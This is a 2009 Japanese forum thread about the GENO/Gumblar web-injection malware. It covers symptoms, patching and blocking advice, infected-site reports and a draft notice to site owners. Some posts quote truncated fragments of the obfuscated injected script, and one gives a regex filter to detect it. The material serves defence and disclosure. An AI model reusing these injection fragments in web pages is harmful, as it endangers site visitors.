GENOウイルススレ
at INTERNET
1:192.168.0.774
09/05/16 14:04:24 hzDONx9U0
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
URLリンク(anubis.iseclab.org)
★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
★このサイトは諸事情により内容を書き換え
URLリンク(www3.atword.jp)
2:192.168.0.774
09/05/16 14:07:34 EILz2Sb70
感染予防対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例
1.Adobe Readerを起動し「編集」メニューの「環境設定」
「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
OKを押して設定確定後、Adobe Readerを終了。
↓
2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
設定は SpeedUp - Fast がおすすめ。
注意すべきは
Acroform(拡張子なし)
Annotations(拡張子なし)
これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
そうしないと Adobe Reader が起動しなかったりする。
このとき追加作業として
EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
より安心かもしれない。
以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
3:192.168.0.774
09/05/16 14:08:00 EILz2Sb70
以下攻撃されたサイト
小林製薬
URLリンク(www.kobayashi.co.jp)
国内の正規サイト改ざん:攻撃サイトを変え再襲来
URLリンク(www.so-net.ne.jp)
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
4:192.168.0.774
09/05/16 14:08:20 EILz2Sb70
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
5:192.168.0.774
09/05/16 14:08:46 EILz2Sb70
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
6:192.168.0.774
09/05/16 14:09:24 EILz2Sb70
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。
初心者や質問がある方は
スレリンク(doujin板)
上記のスレに行くと優しく教えてくれるかもです
Adobe Flash Player バージョンテスト
URLリンク(www.adobe.com)
7:192.168.0.774
09/05/16 14:10:56 hzDONx9U0
改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
8:192.168.0.774
09/05/16 14:14:11 cmMngAoD0
亜種があるから>>7でないからと言って絶対に白だとはいえないが、
>>7だったら100%黒
9:192.168.0.774
09/05/16 14:14:14 v6iqPVHwP
現行スレ
同人板
【管理も】同人サイト・GENOウィルス注意2【閲覧も】
スレリンク(doujin板)
セキュリティ板
GENOウイルススレ ★5(実質★6)
スレリンク(sec板)
10:192.168.0.774
09/05/16 14:16:50 EILz2Sb70
>>1
スレ立て乙でした。
テンプレはこんなものですか
11:192.168.0.774
09/05/16 14:18:10 hzDONx9U0
ageていきましょう
12:192.168.0.774
09/05/16 14:20:02 uAe98uZ60
ん?もう書いてええのん?
13:192.168.0.774
09/05/16 14:31:58 tn4HDAid0
IPブロックの纏めテキストと、PG2での導入方法等も纏めた方がよさげか
14:192.168.0.774
09/05/16 14:37:33 v6iqPVHwP
まとめると
サイトを開く
↓
htmlに書かれたjsコードが実行される
↓
別サイトへジャンプ?ファイル名.exeが実行される<ここでvistaならUACが出るはず
↓
実行すると感染?C:\WINDOWS\system32\sqlsodbc.chmが上書きされる。<vistaの場合はC:\Windows\Help\mui\sqlsodbc.chm
↓
regedit.exe,cmd.exeが起動しなくなる?特定のサイトへのアクセス不可。
↓
オワタ
こんな感じでいいのかな。
で同人板の奴は感染した状態でFPTのサイトを更新しちゃうとパスワードとか抜かれて不正にサイトが書き換えられてしまう
って事でいいのかな?今北で情報が多くてよくわからん
15:192.168.0.774
09/05/16 14:38:39 ayXPZTg40
スレリンク(poverty板)
これは既出?もう用無し?
16:192.168.0.774
09/05/16 14:47:30 arP7FdRW0
こんなときだからこそ
リンク先の内容も一緒に貼って欲しい
17:192.168.0.774
09/05/16 14:50:03 ayXPZTg40
ごめん。内容はコレ↓
【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
1 : 番組の途中ですがアフィ禁止です :2009/05/15(金) 12:44:31 ID:QP0LhXxzP
ソース (p)スレリンク(sec板)
対策と駆除はこちら (p)URLリンク(www29.atwiki.jp)
Adobe Reader/Flashのアップデートをお忘れ無く (p)URLリンク(www.adobe.com)
745 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:31:09
>>745
( ゚Д゚)
何だと・・・?
748 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:34:45
>>746
前のレスにも出てるけど(p)URLリンク(www3.atword.jp)のサイトにかいてある
(中略)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。何度Mail送っても反応無いので・・・・・
749 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
751 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:44
マジでヤバイなこれw
753 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
18:192.168.0.774
09/05/16 14:51:25 ayXPZTg40
あー・・もうなんかグダグダorz許して
19:192.168.0.774
09/05/16 14:53:44 gMiU0OeL0
勘違いする人が増えるような貼りかた止めろ
それ@niftyがホストしてるサイトの一部にってことだろ
20:192.168.0.774
09/05/16 14:55:51 ayXPZTg40
そうなのか。騒いでごめんなさい
21:192.168.0.774
09/05/16 15:12:09 v6iqPVHwP
フィルター始めて作ってみたけどどうだろ。
name
test
match
(function([^>]++){var\s[^>]++='%';var\s[^>]++.replace([^>]+);eval(unescape([)]+))})(/,/g);
replace
<!-- type hidden --!>
22:192.168.0.774
09/05/16 16:39:00 +Kk3rzau0
ニュー速もきましたよ
スレリンク(news板)
23:192.168.0.774
09/05/16 16:58:38 OzJB1Y+z0
何かギスギスしてんな
24:192.168.0.774
09/05/16 18:08:57 L69MESm3O
>>1
乙
25:192.168.0.774
09/05/16 18:12:33 v6iqPVHwP
どうやらここが次スレになるらしい
あぼん出来るし良かった
26:192.168.0.774
09/05/16 18:17:17 cXEySQE80
>>25
向こうに7立ったみたいw
27:192.168.0.774
09/05/16 18:19:07 zXe/9KrE0
俺が立てといた
窓口は多い方がいいと思ってね
28:192.168.0.774
09/05/16 18:21:17 v6iqPVHwP
>>27
随分と荒れた窓口だな
29:192.168.0.774
09/05/16 18:25:02 H7YmOp+10
隔離スレにもなりゃしねぇ
30:192.168.0.774
09/05/16 18:57:13 zXe/9KrE0
俺は普通に波風タタサズニ立てたかったんだけどね
31:192.168.0.774
09/05/16 23:10:45 WN9EdhyZ0
むしろこっちはまったりやればいい
32:192.168.0.774
09/05/17 11:37:22 T9pTie3x0
セキュ板が荒れたので情報まとまらない。
こっちへ移動してきた。ヨロ。
33:192.168.0.774
09/05/17 11:37:51 QnwsxDv40
同じく、よろ。
34:192.168.0.774
09/05/17 11:39:21 MP/sWvjo0
俺もこっちにしよう
35:192.168.0.774
09/05/17 11:40:45 ma6xyjDQ0
ヤレヤレ。こっちまで追いかけてこないでくれればいいんだけど。
36:192.168.0.774
09/05/17 11:40:51 FkD7jhlA0
同人板からきました\(^O^)/
37:192.168.0.774
09/05/17 11:40:59 dj6spVc50
変な奴もまとめてこっちに来ればいい
まとめてNGできるし
38:192.168.0.774
09/05/17 11:41:36 MP/sWvjo0
コレ、テンプレ追加でいい?
GENOのウイルスサイトチェッカー完成した
URLリンク(geno.2ch.tc)
39:192.168.0.774
09/05/17 11:42:52 DhBs/7gt0
いいんじゃね
40:192.168.0.774
09/05/17 11:43:25 5zpzhS0v0
必要な情報は上で揃ってるな
特に追加するようなことは今のところないよね?
41:192.168.0.774
09/05/17 11:44:03 T9pTie3x0
向こうの最後の方ににあった感染サイト
うこっけい?とかあの辺ってもうまとめに入ってるのかな?
42:192.168.0.774
09/05/17 11:44:21 gUnnPMxe0
・なんらかの方法によるサーバへの侵入
FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・Webサイトの改ざん
具体的にはdocument.write(unescape('%3CsI0cTJrZliptのようなスクリプトコードを
各ページに埋め込まれます。
%3CsI0cTJrZliptの部分については異なるパターンもあったようです。
・そのほかの詳細は不明です
発見方法
・公開しているすべてのページに該当スクリプトコードが埋め込まれているか
確認してください。その他の影響については詳細不明です。
対処
感染WebサイトについてはOS,Webサーバソフトが多岐にわたっており
管理FTPパスワードの漏洩なのかSQLインジェクション等の
Webアプリ脆弱性を攻撃されたものなのかわかっていません。
改ざんされたスクリプトコードの削除だけで済む問題ではなく
侵入された経路の究明および対策が必要となってくると思われます。
43:192.168.0.774
09/05/17 11:45:27 QnwsxDv40
何か変化起きた時のために保守気味で進行でいんじゃね?
先週金曜まではそうだったし。
saymoveと同人が来てから無駄に加速したね。
44:192.168.0.774
09/05/17 11:45:48 Sggs+C2i0
>>38
ありがとう助かります。
何せ外部リンクを結構チェックしないといけないので
45:192.168.0.774
09/05/17 11:46:35 dj6spVc50
同人というより鬼の首とったように
質問してる奴は腐腐言ってるやつの方が厄介だった気がする
46:192.168.0.774
09/05/17 11:48:59 T9pTie3x0
静けさが嘘のようだw
47:192.168.0.774
09/05/17 11:50:50 6zykGUMd0
よろしくー
48:192.168.0.774
09/05/17 11:51:08 MP/sWvjo0
ID出るだけでこうも違うとはw
>>44
作者さんに言ってあげて。俺、単なる間違い指摘入れただけの人だから。
49:192.168.0.774
09/05/17 11:51:42 rsI8zkAT0
移動完了
50:192.168.0.774
09/05/17 11:53:03 6zykGUMd0
烏骨鶏は凸電誰かしましたか?
放置しておくと大変なことになる
51:192.168.0.774
09/05/17 11:53:07 ffQj4EqF0
AdobeAcrobatReaderのJavaScriptの脆弱性って、今年の3月にver.9.1で修正されたものと、
5月にver.9.1.1で修正されたものの2種類あるんだが、
いわゆるGENOウイルスってどちらの脆弱性ついたんだろうな。
もちろんどの脆弱性が塞がれているから安心ってのは無いけど、情報として知っておきたい。
52:192.168.0.774
09/05/17 11:56:19 /tk9oSEO0
>>50
電話番号書いてあるのは公式HPぐらい。
缶切りが缶詰の中に入ってる状態とはこの事
53:192.168.0.774
09/05/17 11:57:28 vLbMFr+GP
誰かタウンページ持ってこい
54:192.168.0.774
09/05/17 11:59:04 T9pTie3x0
>>50
流れちゃってわかんないけど、もいっこあった希ガス
55:あっちのスレの42
09/05/17 11:59:23 2KRNOGSH0
>>51
9.1.1で修正された方だと思っていたが・・・。
56:192.168.0.774
09/05/17 11:59:46 6zykGUMd0
ver.9.1ではバッファーオーバーフローの脆弱性あったよね
ver.9.1.1でそれを解決したんじゃない
57:192.168.0.774
09/05/17 12:01:29 Sggs+C2i0 BE:762340739-S★(634668)
これいいかな?
URLリンク(tvsurf.jp)
58:192.168.0.774
09/05/17 12:01:52 ffQj4EqF0
>>55
あっちのスレの42さんか、俺はてっきり9.1修正のほうだと思ってたんで、逆に42さんの書き込みみてどうしたものかと思った口なんだ。
いまのところ、ウイルス対策ベンダにも2chも情報が少ない状態過ぎる。
59:192.168.0.774
09/05/17 12:02:30 2KRNOGSH0
ダメだ。あっちのスレでこっちに誘導してる・・・。
60:192.168.0.774
09/05/17 12:04:01 0Et/Qq5U0
>>59
>>37
61:192.168.0.774
09/05/17 12:04:03 MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認
62:192.168.0.774
09/05/17 12:05:20 6zykGUMd0
>>61
今日は休みじゃないかな?
63:192.168.0.774
09/05/17 12:06:39 2KRNOGSH0
>>59
いや、俺の思い込みかもしれない。
9.1の脆弱性をついた攻撃が既に広まっていたから、adobeが大急ぎで作ったのが9.1.1だったはず。
GENOのとタイミングが合っていたから 9.1の方ってのは可能性も考えてなかった。
情報は本当に少ないね。
64:192.168.0.774
09/05/17 12:09:32 T9pTie3x0
>>61
うこっけい
URLリンク(www.100bangai.co.jp)
これか?お菓子やさんだったの・・・?
googleからurl検索したらavastさんが怒って焦ったw
65:192.168.0.774
09/05/17 12:21:14 6zykGUMd0
61 名前:192.168.0.774[sage] 投稿日:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認 ここは出版社
烏骨鶏はhxxp://www.ukokkei.co.jp/
フリーダイアルしか載ってないな、受注オペレーターじゃ話にならないし ><
66:192.168.0.774
09/05/17 12:23:41 T9pTie3x0
>>65
>>64に載ってるよ。多分それ。そこは踏んでも平気。
ukokkeiのurlで検索するとトロイ検出するから気をつけてw
店舗のメアドがない
67:192.168.0.774
09/05/17 12:26:11 MP/sWvjo0
>>65
せいびどう出版社って何処だか知らないけど、オペレーターに訳を説明して
TEL転送とか、電話先を教えてくれるんじゃない?
68:192.168.0.774
09/05/17 12:28:00 PUr+H3m+0
「お宅のHPを見たらウィルスの警告が出てくる。
どういうわけか説明してもらいたい。」
って言えば良いんじゃない?
69:192.168.0.774
09/05/17 12:29:48 T9pTie3x0
本名で教えても良いけど、ウイルス食らっちゃうような店に
言っても解るとも思えないし、下手したら自分が変質者扱いだろうな・・・
でも専門店街代表のメールしかないからメールしてもその人たちが踏んじゃいそう
70:192.168.0.774
09/05/17 12:31:42 6zykGUMd0
こことhxxp://www.ukokkei.co.jp/
専門店街は住所が違うよ
71:192.168.0.774
09/05/17 12:32:07 xG23ce6c0
>>5
感染者がcmd.exeを起動してはダメというレスを別板で見たんだが
このテンプレはこれでいいのか?
72:192.168.0.774
09/05/17 12:32:20 2KRNOGSH0
IPAも平日しか働いていないのか・・・。
受付時間:平日10:00〜12:00、13:30〜17:00
73:192.168.0.774
09/05/17 12:37:07 6zykGUMd0
とりあえずフリーダイアルで電話して
責任者読んで説明してみる
74:192.168.0.774
09/05/17 12:38:07 PUr+H3m+0
>>73
お前が失敗すると後から凸っても全部悪戯扱いだからな。
それなりに頑張れ
75:192.168.0.774
09/05/17 12:39:36 T9pTie3x0
>>73
フリーダイアルは専門店街のやつ?
76:192.168.0.774
09/05/17 12:41:04 6zykGUMd0
>>75
www.ukokkei.co.jp/ ここ
77:192.168.0.774
09/05/17 12:42:49 T9pTie3x0
>>74
プレッシャーかけんなww
so-netの説明がそれなりに説得力あるけど
URLリンク(www.so-net.ne.jp)
電話だとえっちてーてーぴー.って言わないとダメだな
まぁ焦って一軒閉鎖した所で・・・・・・・・・・(´・ω・`)
78:192.168.0.774
09/05/17 12:43:13 6zykGUMd0
【本店】のフリーダイヤル
79:192.168.0.774
09/05/17 12:45:11 2KRNOGSH0
>>71
たしかに感染サイトのお詫び文には
cmd 起動でエクスプローラーが落ちてregeditが起動できなくなるって書いてあったな。
ウィルスを無効化する方法も書いてあったけど、
あっちスレに転載すると、とんでもないことになりそうだからやめといた。
その方法で本当に無効化できるのかも分からんし、regeditで失敗されても困るし。
バックドアやダウンローダーが入り込んでいれば、仮に無効化できてもいつまで効くか分からないしね。
80:192.168.0.774
09/05/17 12:45:45 PUr+H3m+0
電凸用のテンプレも必要になってくるのかな?
>>77へ
・GENOウィルスというコンピュータウィルスがある。
・Adobe Readerと言う文章読むプログラムの脆弱性を利用し感染する。
・感染したPCでホームページを更新すると、その時にパスワード等を盗み出してしまう。
・盗み出したパスワードでホームページを表示は元のまま、ウィルスのコードが書き加えられてしまう。
・現在お宅のホームページは書き換えられている。
・ソネットで詳しく説明されているので、ホームページの更新担当の人にこの情報を伝えて欲しい。
81:192.168.0.774
09/05/17 12:47:00 6zykGUMd0
電話でない罠>本店
82:192.168.0.774
09/05/17 12:49:33 T9pTie3x0
>>80
正攻法ならそれでいいんじゃない?
・ホームページを見た人が感染する
製作が別会社とか相手がアレだとGENO状態になるかもしれないけど
大手がやられて閉鎖してるってのは入れておいた方が良いとおもうw
so-net読んでもわからんかもね
83:192.168.0.774
09/05/17 12:54:36 c9IgsGG/0
出版社のHPはいろんな大手書店が発注やら在庫確認なんかで使用するので
ものすごいことになると予想
普通に店頭のPCで開いて客に見せたりするからね
84:192.168.0.774
09/05/17 12:55:41 +3+vFr3c0
wiki重いぬ
85:192.168.0.774
09/05/17 12:57:28 ytTR6LEA0
烏骨鶏と出版社のWhoisを調べる。
86:192.168.0.774
09/05/17 12:58:45 Um/4qeYR0
成美堂出版が感染しました
87:192.168.0.774
09/05/17 12:59:12 6zykGUMd0
a. [ドメイン名] UKOKKEI.CO.JP
e. [そしきめい] かぶしきがいしゃ うこっけい
f. [組織名] 株式会社烏骨鶏
g. [Organization] ukokkei,co.,Ltd.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] MU2056JP
n. [技術連絡担当者] DT033JP
p. [ネームサーバ] ns1.webhosting-jp.com
p. [ネームサーバ] ns2.webhosting-jp.com
[状態] Connected (2009/11/30)
[登録年月日] 2004/11/16
[接続年月日] 2004/11/16
[最終更新] 2009/03/02 17:40:12 (JST)
88:192.168.0.774
09/05/17 12:59:17 mJUiMCyk0
>>3の下の報告もここでいいのか?
邪魔になってない?
89:192.168.0.774
09/05/17 13:01:24 ytTR6LEA0
>>87
Whoisの結果のこの下に担当者と連絡先
があったような気がするのだが。
90:192.168.0.774
09/05/17 13:01:40 Sggs+C2i0 BE:508227629-S★(634671)
>>88
向こうのスレを見ていると機能していないんですよね
91:192.168.0.774
09/05/17 13:02:58 6zykGUMd0
>>89
それが無いです
92:192.168.0.774
09/05/17 13:05:32 T9pTie3x0
>>87
あるよ。
担当者名とメールアドレス
ここに晒しちゃまずいかな?
レン鯖はフューチャースピリッツ
93:192.168.0.774
09/05/17 13:05:40 ilxyL7Fy0
>>5
>Bavast!(無料のアンチウイルスソフト)で確認
これ違う。感染後の確認には使えない。
avastは、感染を撒き散らしているサイトのスクリプトの大半に反応するので、ブロックできる
可能性が高いというだけ。(感染しているのにすり抜けるページも幾つか確認しているので、
完全には信用できない)
すり抜けて本体が落とされてしまった場合、Avastで検索しても見つからない可能性が高い。
(ほぼ日替わりで本体が入れ代わっており、入れ代わった後のパターン対応はどこの
セキュリティソフトベンダーでも追い付いていない)
予防法としては、Avastで感染サイトを訪問すると反応する(いくらかのすり抜けは発生する)ので
チェック可能。但し、すり抜けた時はがっつり感染するので自己責任。
幾つかのベンダーが行なっている本体の置かれているサイトをFW機能でブロックするのが
一番確実な方法。FW機能のないセキュリティソフトの場合、PG2の併用によってブロックするのが有効。
但し、本体の置かれるアドレスが変更になった場合(先週の金曜日辺りに入れ代わったんだっけ?)
ブロック対象の指定を追加しなければいけない。
スクリプトを検知するAvastの方式も、IP範囲をブロックするカスペ等の方式も、両方完璧ではないが
予防法としては一定の効果が見込めるというだけ。
94:192.168.0.774
09/05/17 13:06:06 ytTR6LEA0
>>91
昔調べたときあったと思ったのだなあ。
Whoisがそれでトラブルがあったとしか記憶がない。
ないならしょうがないか。
ありがとう。
95:192.168.0.774
09/05/17 13:06:43 6zykGUMd0
>>92
あった?Whoisは公開されてるものだからいいでしょ
96:192.168.0.774
09/05/17 13:07:39 ytTR6LEA0
>>92
>担当者名とメールアドレス
>レン鯖はフューチャースピリッツ
そこに警告のメールを送ってみるしかないだろうね。
97:192.168.0.774
09/05/17 13:08:17 IjPG7tgR0
>>80
素人向けには難しい言葉ばかりだな。
・GENOウィルスというコンピュータウィルスがある。
・pdfファイルを読むプログラムに問題があり感染する。
・現在御社のホームページは書き換えられ、GENOウィルスが仕込まれている。
・総務部門かホームページの担当者にこの情報を伝えて欲しい。
これぐらいでいいんじゃね?
98:192.168.0.774
09/05/17 13:08:53 6zykGUMd0
>>92
Whoisクライアント何使ってるんですか?
99:192.168.0.774
09/05/17 13:08:58 mJUiMCyk0
>>90
煽りや質問多いもんな
100:192.168.0.774
09/05/17 13:09:52 2KRNOGSH0
>>88
スレがあんなにヒドイことになると思わずに立ったスレだから、
仕方ないよね。
>>96
名前と電話番号
みっけた。
けど、ここに書いて本当にいいのか俺には分からない。
101:192.168.0.774
09/05/17 13:10:13 T9pTie3x0
>>95
URLリンク(whois.ansi.co.jp)
店舗のメールだね
102:192.168.0.774
09/05/17 13:10:15 um/XFnMU0
>>97
pdfなんて拡張子伝えられても訳ワカメだと思ったんでAdobe Readerって名前入れておいた。
それ以外に関してはそれでも良いかもだけど、その程度の情報だと今度は怪しい勧誘みたいにも聞える
103:192.168.0.774
09/05/17 13:10:30 7TaPV4fL0
>>93
やっぱ現段階ではNoScript必須ですな。
JavaScriptを利用しない形式に変わったらそれすら無効ですが・・・。
104:192.168.0.774
09/05/17 13:11:54 T9pTie3x0
>>97
2番目が難しいと思う
見た人(顧客)が感染するって入れた方がいいんでない
105:192.168.0.774
09/05/17 13:11:57 ilxyL7Fy0
>>42
>・なんらかの方法によるサーバへの侵入
>FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・セキュ板のGENOスレの1か2辺りで、ローカルにしか繋いでいないサーバーのhtmlが書き換えられたという報告
(動作中のマルウェアが行なっているのか、外部からのバックドア経由の操作なのかは不明)
・ftpログを見たら、海外からのアクセスで改変が行われていたという報告(ftpパスは漏洩していると考えるべき)
・動作解説してるサイトの翻訳では、感染PCがゾンビ化するというものがあったので、BOTネットに組込まれている
可能性があり、そちらから操作される可能性がある
こんな感じかな。
106:192.168.0.774
09/05/17 13:12:03 I5G8A/p20
>>98
URLリンク(whois.jprs.jp)
でWhois検索すると、登録担当者と技術担当者のIDがリンクで出てくるのでそれをポチっと。
107:192.168.0.774
09/05/17 13:13:30 ytTR6LEA0
>>100
感染したサイトの会社に連絡つかないと
そこしか通報するしかないからねえ。
とりあえず、文章だけども考えておかないと。
108:192.168.0.774
09/05/17 13:13:49 6zykGUMd0
>>106
あり〜
109:192.168.0.774
09/05/17 13:16:03 ilxyL7Fy0
○○○○ ご担当者さま
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで感染したPCを利用して、
HPの更新作業を行なったため、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)
現在の状況になっているものと思われます。
これは、先日、小林製薬のHPで発生したものと同じものと思われますので
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知を
行なって頂けないでしょうか。
下記のXXXXXにて報告があり、当方でも確認したところ、確かに危険コードが
含まれておりました。HP閲覧者のPCにウイルスが勝手にダウンロードされて
しまうため、御社のHPが意図せぬ加害者となっております。
(感染報告のあったスレッド等のアドレス)
HP更新に使用したPCがマルウェア(通称zlkon・GENOウイルス)に感染していると思われます。
■ 確認した感染ページ
(わかる範囲で記載)
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
110:192.168.0.774
09/05/17 13:17:21 T9pTie3x0
>>109
俺が担当なら読まないで捨てるww
so-net貼ってあげたら?
111:192.168.0.774
09/05/17 13:17:22 ilxyL7Fy0
■感染していると思われるページの危険部分
(一応、ページによって内容異なるので、ソースチェッカーなり、
IE以外のブラウザでview-source:〜 で確認したものを貼り付ける)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>
■ 感染していると思われるウイルスの情報
下記のサイトの情報にあるマルウェアによるものと思われます。
これは、Web閲覧で知らぬうちに導入されてしまうものです。
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
URLリンク(www.kobayashi.co.jp)
URLリンク(www29.atwiki.jp)
(↓はちょっと専門的な解説です)
URLリンク(ilion.blog.shinobi.jp)
URLリンク(www.itmedia.co.jp)
このマルウェアに感染したPCで、FTP接続しファイルを更新すると、動作中の
マルウェアが、感染サイトを呼び出すスクリプトを勝手に挿入してしまうため、
現在の状況になっているものと思われます。
PC内のアップロード前のファイルには、現在でも危険なコードは含まれて
いない筈ですので、PC復旧作業に入る前に、なんらかのメディアに
バックアップをとっておくと良いでしょう。
■ 解決方法について
駆除方法
URLリンク(www29.atwiki.jp)
一度感染してしまうと、PC稼動状態で除去するのは困難ですので、必要なデータを
バックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にしてください。(IDとかパスワードのメモやブックマークも
忘れずにバックアップを)
OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
安全なPCから、不正なスクリプトを含まないhtmファイルをアップロードすることで
HPは正常な状態に戻ると思われます。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
112:192.168.0.774
09/05/17 13:18:24 ilxyL7Fy0
(以下を付けるかどうかはお好みで)
■再発防止策
WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデートに
加えて、既知の危険サイト(今回の場合は、URLリンク(www29.atwiki.jp)の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、PG2といったソフトで
ブロックすることしかないと思います。
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
■私見による蛇足
小林製薬の告知ページ等では、幾つかのセキュリティソフトベンダーを紹介して
おりますが、実際に稼動する本体は、ほとんど日替わりのように入れ替えられて
いる為に、紹介されているセキュリティソフトにて「除去が行なえるとは言い
切れません」。
URLリンク(www.kobayashi.co.jp)
また、感染ファイルの除去を行なっても、Windowsの一部ファイルを変更して
しまっている為、原状復帰には至りませんので、閲覧者向けに告知される場合は、
セキュリティソフトベンダーのソフトでで駆除できる可能性もありますが
PCのリカバリを推奨するのが良いのではないかと思われます。
以上、要件のみにて失礼致します。
--
○○○○(自分の名前) <自分の連絡先メールアドレス>
113:192.168.0.774
09/05/17 13:19:27 ilxyL7Fy0
>>109,>111-112
昨日、みかけた範囲の感染サイト管理者に送ったメールのコピペ。
テンプレの叩き台にでもどうぞ。
114:192.168.0.774
09/05/17 13:19:43 mJUiMCyk0
>>90
>>100
スレリンク(sec板:907番)
長くなっちったから
ぬっちしたアドレスだけ置いとく ありがとう
115:192.168.0.774
09/05/17 13:19:59 AvccT1I50
